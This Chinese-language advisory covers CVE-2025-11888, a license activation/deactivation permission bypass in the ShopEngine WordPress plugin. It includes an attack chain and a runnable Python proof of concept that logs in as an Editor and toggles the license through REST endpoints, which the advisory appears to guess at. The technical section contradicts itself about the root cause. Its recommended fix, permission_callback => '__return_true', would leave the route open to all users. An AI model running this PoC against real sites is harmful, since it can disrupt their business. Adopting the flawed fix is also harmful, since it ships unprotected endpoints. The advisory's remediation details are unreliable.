CVE-2025-11888 WordPress ShopEngine插件权限绕过漏洞

漏洞信息

漏洞编号

CVE-2025-11888

漏洞类型

权限绕过

CVSS评分

2.7 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

ShopEngine Elementor WooCommerce Builder Addon plugin for WordPress

漏洞概述

CVE-2025-11888是WordPress平台ShopEngine Elementor WooCommerce Builder插件中的一个高权限授权绕过漏洞。该插件是一款功能全面的WooCommerce解决方案，为WordPress网站提供完整的电商功能支持。漏洞存在于插件的许可证管理模块，具体问题出在post_deactive()函数和post_activate()函数上。这两个函数负责处理插件许可证的激活和停用操作，但缺乏足够的权限验证机制。

在WordPress的权限体系中，许可证管理通常需要管理员级别权限才能操作，因为许可证状态直接关系到插件的合法使用和商业授权。然而，由于该插件对这两个关键函数的权限检查不足，任何具有编辑者（Editor）级别及以上权限的认证用户都可以调用这些函数来激活或停用许可证。这意味着拥有相对较低权限的内部人员（如内容编辑、产品管理员）可以执行原本只有站点管理员才能进行的许可证操作。

该漏洞的潜在危害包括：攻击者可以恶意停用有效许可证，导致网站功能异常或业务中断；或者未经授权激活许可证，绕过正常的采购流程。此外，许可证管理功能通常与远程验证服务器通信，存在信息泄露或中间人攻击的风险。虽然CVSS评分较低（2.7），但在多用户协作的WordPress网站环境中，该漏洞仍可能造成实际的安全威胁和业务影响。

该漏洞影响插件4.8.4及以下所有版本，已在4.8.5版本中得到修复。建议使用该插件的网站管理员尽快更新至最新版本，并审查具有编辑权限的用户账户，确保没有可疑活动。对于无法立即更新的场景，应考虑限制编辑者角色的功能或实施额外的访问控制措施。

技术细节

漏洞根因在于ShopEngine插件的WordPress REST API端点缺乏正确的权限回调验证。在WordPress插件开发中，REST API路由可以通过register_rest_route()函数注册，并指定权限回调（permission_callback）来控制访问。然而，post_deactive()和post_activate()函数对应的API路由在注册时未正确设置权限检查，或权限检查逻辑存在缺陷。

具体来说，这些函数直接处理许可证激活/停用的HTTP POST请求，但没有验证调用者是否具有管理员权限。在WordPress中，管理许可证通常需要manage_options能力（对应管理员角色），但该插件允许任何具有edit_posts能力（编辑者角色）的用户访问这些端点。攻击者只需构造特定的HTTP请求，包含有效的认证Cookie（编辑者级别会话），即可触发许可证状态变更。

利用此漏洞的技术步骤：首先，攻击者需要拥有一个WordPress编辑者级别或更高权限的账户。登录后，通过浏览器开发者工具或HTTP抓包工具捕获正常的WordPress REST API请求结构。然后，向插件的许可证管理端点（如/wp-json/shopengine/v1/license/deactivate或activate）发送POST请求。由于插件仅检查用户是否已登录（is_user_logged_in()），而未验证manage_options能力，请求将成功执行。

服务器端接收到请求后，post_deactivate()函数会调用第三方服务验证当前许可证状态，然后将其标记为停用。post_activate()函数则调用激活接口。整个过程无需管理员干预，攻击者可以在后台静默执行。修复方案是在REST API路由注册时添加permission_callback => '__return_true'，并在使用前显式检查current_user_can('manage_options')，确保只有管理员可以操作许可证。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标网站使用WordPress CMS，并确认安装了ShopEngine Elementor WooCommerce Builder插件（版本≤4.8.4）

STEP 2

2. 账户获取

攻击者通过社会工程学、密码爆破或内部人员获取一个具有编辑者（Editor）级别或更高权限的WordPress账户

STEP 3

3. 身份认证

使用获取的账户凭据登录WordPress，获取有效的会话Cookie和REST API访问权限

STEP 4

4. 构造恶意请求

构造针对/wp-json/shopengine/v1/license/deactivate或activate端点的HTTP POST请求，包含认证Cookie

STEP 5

5. 漏洞利用

发送请求触发post_deactive()或post_activate()函数，由于权限检查不足，请求被服务器接受并执行

STEP 6

6. 许可证状态变更

服务器调用许可证管理API，变更许可证激活状态，导致插件功能受限或业务中断

STEP 7

7. 持久化/后续攻击

攻击者可重复执行以持续干扰业务，或利用许可证管理接口进行进一步侦察和信息收集

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys
from urllib.parse import urljoin

# CVE-2025-11888 PoC - ShopEngine Plugin License Activation/Deactivation Bypass
# Authenticated users with Editor role can activate/deactivate licenses

def exploit_cve_2025_11888(target_url, username, password, action='deactivate'):
    """
    Exploit for CVE-2025-11888
    target_url: Target WordPress site URL
    username: WordPress username with Editor role or higher
    password: User password
    action: 'activate' or 'deactivate'
    """
    
    session = requests.Session()
    
    # Step 1: Login to WordPress
    login_url = urljoin(target_url, '/wp-login.php')
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    
    print(f"[*] Logging in as {username}...")
    response = session.post(login_url, data=login_data, allow_redirects=True)
    
    if 'wordpress_logged_in' not in str(session.cookies) and 'wp-settings' not in response.url:
        print("[-] Login failed!")
        return False
    print("[+] Login successful!")
    
    # Step 2: Exploit the vulnerable endpoint
    if action == 'deactivate':
        endpoint = '/wp-json/shopengine/v1/license/deactivate'
    else:
        endpoint = '/wp-json/shopengine/v1/license/activate'
    
    exploit_url = urljoin(target_url, endpoint)
    
    print(f"[*] Sending {action} request to {exploit_url}...")
    exploit_data = {
        'license_key': 'any-license-key-here'  # May not be required
    }
    
    response = session.post(exploit_url, json=exploit_data)
    
    if response.status_code == 200:
        print(f"[+] License {action} successful!")
        print(f"[+] Response: {response.text}")
        return True
    else:
        print(f"[-] Exploit failed with status code: {response.status_code}")
        print(f"[-] Response: {response.text}")
        return False

if __name__ == '__main__':
    if len(sys.argv) < 5:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password> <action>")
        print("Example: python exploit.py http://example.com admin password123 deactivate")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    action = sys.argv[4]
    
    exploit_cve_2025_11888(target, user, pwd, action)

影响范围

ShopEngine plugin for WordPress < 4.8.5 (all versions up to and including 4.8.4)

防御指南

临时缓解措施

由于该漏洞需要认证用户才能利用，短期内可通过以下措施缓解风险：1）审查并删除不必要的编辑者级别账户，确保只有可信人员拥有该权限；2）限制用户注册功能，禁止普通用户注册；3）在Web服务器层面配置IP白名单，仅允许受信任的IP地址访问/wp-admin/和REST API端点；4）使用WordPress安全插件监控可疑的用户活动和API调用；5）如果业务允许，可临时禁用ShopEngine插件的许可证自动验证功能，但需注意可能影响插件正常使用。最终解决方案仍是升级到4.8.5版本。